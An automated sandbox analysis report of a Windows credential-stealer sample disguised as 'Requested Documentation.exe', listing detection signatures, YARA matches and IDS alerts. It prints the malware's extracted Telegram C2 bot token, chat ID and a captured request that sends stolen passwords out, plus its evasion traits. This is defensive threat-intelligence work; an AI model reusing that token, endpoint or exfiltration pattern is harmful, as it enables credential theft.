
Windows Analysis Report
Requested Documentation.exe

Overview

General Information

Sample name: Requested Documentation.exe
Analysis ID: 1582315
MD5: 7ccc5d635cbd8627f4f2aac3e54248d0
SHA1: cc315dfc181424321b7e82bb19bab2d949346aa3
SHA256: bbe22c9c5c417bd5f92f310e994ed7b0ea3323feabc7d16eb14d25b84059d38d
Tags: exe, RedLineStealer, user-TeamDreier

Detection

MassLogger RAT, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code references suspicious native API functions
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Requested Documentation.exe (PID: 7160 cmdline: "C:\Users\user\Desktop\Requested Documentation.exe" MD5: 7CCC5D635CBD8627F4F2AAC3E54248D0)
    • RegSvcs.exe (PID: 6344 cmdline: "C:\Users\user\Desktop\Requested Documentation.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
{"C2 url": "https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg", "Telegram Chatid": "5839829477"}
Source | Rule | Description | Author | Strings
00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security |
00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown | matched strings listed below
  • 0x21c2d:$a1: get_encryptedPassword
  • 0x49d65:$a1: get_encryptedPassword
  • 0x21c01:$a2: get_encryptedUsername
  • 0x49d39:$a2: get_encryptedUsername
  • 0x21cc5:$a3: get_timePasswordChanged
  • 0x49dfd:$a3: get_timePasswordChanged
  • 0x21bdd:$a4: get_passwordField
  • 0x49d15:$a4: get_passwordField
  • 0x21c43:$a5: set_encryptedPassword
  • 0x49d7b:$a5: set_encryptedPassword
  • 0x21a10:$a7: get_logins
  • 0x49b48:$a7: get_logins
  • 0x20f82:$a8: GetOutlookPasswords
  • 0x490ba:$a8: GetOutlookPasswords
  • 0x20496:$a9: StartKeylogger
  • 0x485ce:$a9: StartKeylogger
  • 0x1eef7:$a10: KeyLoggerEventArgs
  • 0x4702f:$a10: KeyLoggerEventArgs
  • 0x1eec6:$a11: KeyLoggerEventArgsEventHandler
  • 0x46ffe:$a11: KeyLoggerEventArgsEventHandler
  • 0x21ae4:$a13: _encryptedPassword
Source | Rule | Description | Author | Strings
1.2.RegSvcs.exe.400000.0.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen | matched strings listed below
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 7A 88 44 24 2B 88 44 24 2F B0 20 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
1.2.RegSvcs.exe.5680ee8.6.raw.unpack | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security |
1.2.RegSvcs.exe.5680ee8.6.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
1.2.RegSvcs.exe.5680ee8.6.raw.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
1.2.RegSvcs.exe.5680ee8.6.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-30T10:57:11.526050+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 149.154.167.220 | 443 | TCP
2024-12-30T10:57:04.598653+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49730 | 132.226.247.73 | 80 | TCP
2024-12-30T10:57:10.598757+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49730 | 132.226.247.73 | 80 | TCP
2024-12-30T10:57:11.223524+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49732 | 149.154.167.220 | 443 | TCP

AV Detection

Source: 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg", "Telegram Chatid": "5839829477"}
Source: RegSvcs.exe.6344.1.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendMessage"}
Source: Requested Documentation.exe | Virustotal: Detection: 46%
Source: Requested Documentation.exe | ReversingLabs: Detection: 57%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Requested Documentation.exe | Joe Sandbox ML: detected

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Requested Documentation.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: Binary string: _.pdb source: RegSvcs.exe, 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: Requested Documentation.exe, 00000000.00000003.1736119102.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Requested Documentation.exe, 00000000.00000003.1735017129.0000000003E50000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Requested Documentation.exe, 00000000.00000003.1736119102.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Requested Documentation.exe, 00000000.00000003.1735017129.0000000003E50000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009E445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_009E445A
Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009EC6D1 FindFirstFileW,FindClose,0_2_009EC6D1
Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009EC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_009EC75C
Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009EEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009EEF95
Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009EF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009EF0F2
Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009EF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_009EF3F3
Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009E37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009E37EF
Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009E3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009E3B12
Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009EBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_009EBCBC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 1_2_02EAE108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0572F1E1h 1_2_0572EF30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0572F937h 1_2_0572F518
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0572F937h 1_2_0572F507
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0572F937h 1_2_0572F864
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05EEB465h 1_2_05EEB128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05EEAF79h 1_2_05EEACD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05EEFB48h 1_2_05EEF8A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05EEAB21h 1_2_05EEA878
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05EEF6F0h 1_2_05EEF448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05EEA6C9h 1_2_05EEA420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05EEDED8h 1_2_05EEDC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05EEA271h 1_2_05EE9FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05EEDA80h 1_2_05EED7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05EED628h 1_2_05EED380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05EE9E19h 1_2_05EE9B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05EED1D0h 1_2_05EECF28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05EEF298h 1_2_05EEEF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05EEBFA2h 1_2_05EEBEF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05EEBFA2h 1_2_05EEBEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05EECD78h 1_2_05EECAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05EEC920h 1_2_05EEC678
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 1_2_06AA3CBC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 1_2_06AA3C96
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 1_2_06AA7D53

Networking

Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49732 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49732 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839829477&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd288e6a54ccbb Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View | IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View | IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View | IP Address: 132.226.247.73 132.226.247.73
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 132.226.247.73:80
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009F22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_009F22EE
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected: POST /bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839829477&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd288e6a54ccbb Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
Source: RegSvcs.exe, 00000001.00000002.4194140589.00000000031F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: RegSvcs.exe, 00000001.00000002.4194140589.000000000314C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 00000001.00000002.4194140589.00000000031F6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4194140589.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4194140589.0000000003140000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000001.00000002.4194140589.00000000030C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: RegSvcs.exe, 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000001.00000002.4194140589.000000000316D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.org
Source: RegSvcs.exe, 00000001.00000002.4194140589.00000000030C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000001.00000002.4194140589.00000000031F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: RegSvcs.exe, 00000001.00000002.4194140589.00000000031F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: RegSvcs.exe, 00000001.00000002.4194140589.00000000031F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839
Source: RegSvcs.exe, 00000001.00000002.4194140589.000000000314C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: RegSvcs.exe, 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4194140589.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000001.00000002.4194140589.000000000314C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, UltraSpeed.cs | .Net Code: VKCodeToUnicode
Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009F4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_009F4164
Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009F4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_009F4164
Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009F3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_009F3F66
Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009E001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_009E001C
Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_00A0CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00A0CABC

System Summary

Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
Source: 1.2.RegSvcs.exe.5680ee8.6.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 1.2.RegSvcs.exe.5680ee8.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 1.2.RegSvcs.exe.2db1ade.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 1.2.RegSvcs.exe.2db1ade.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 1.2.RegSvcs.exe.408e590.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 1.2.RegSvcs.exe.408e590.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 1.2.RegSvcs.exe.4066458.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 1.2.RegSvcs.exe.4066458.3.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 0.2.Requested Documentation.exe.3c70000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
Source: 1.2.RegSvcs.exe.2db1ade.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 1.2.RegSvcs.exe.2db1ade.2.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 1.2.RegSvcs.exe.2db0bf6.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 1.2.RegSvcs.exe.5680ee8.6.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 1.2.RegSvcs.exe.5680ee8.6.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 1.2.RegSvcs.exe.4066458.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 1.2.RegSvcs.exe.4066458.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 1.2.RegSvcs.exe.5680000.7.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 1.2.RegSvcs.exe.5680000.7.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 1.2.RegSvcs.exe.2db0bf6.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 1.2.RegSvcs.exe.408e590.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 1.2.RegSvcs.exe.408e590.5.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
